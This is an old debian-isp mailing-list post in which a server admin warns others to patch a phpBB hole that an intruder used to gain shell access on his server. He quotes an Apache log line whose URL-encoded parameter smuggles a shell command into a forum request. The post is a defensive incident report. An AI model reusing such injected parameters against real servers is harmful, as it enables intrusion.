Hello debian-isp, maybe little off-topic, but I want to remind you of this phpBB vulnerability, which is fixed in version 2.0.11 (announced on 18th November) which "addresses a potentially serious exploit".
I am writing this because it's not potentional, but real. Before 2 weeks, someone got into my server and run a program which gave shell access on port 2000 (check your machines). Fortunately it had only apache user prividges, but the person tried to run various exploits. So I was sure the only option to get to my server was php. When I was sure no damage could be done, I leaved everything and set-up 2 traps - one was periodic running of netstat | grep ":2000" and the other was creating world-writable /.bash_history :) Today I was lucky, I have IP address probably of the attacker (some GSM provider in Romania) and IP of another "hacked" server. Searching for that IP in apache logs gave me this: 213.xxx.xxx.xxx - - [11/Dec/2004:04:01:59 +0100] "GET /forum/viewtopic.php?t=%38&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20%63%64%20%2F%74%6D%70...... HTTP/1.1" 200 27712 "-" "-" I don't want to give hints on how to exploit this, but the attacker did wget the .tgz file, unpacked it in /tmp and run the program. So update all your phpBB installations ASAP (and of course all installations of your customers). -- bYE, Marki -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
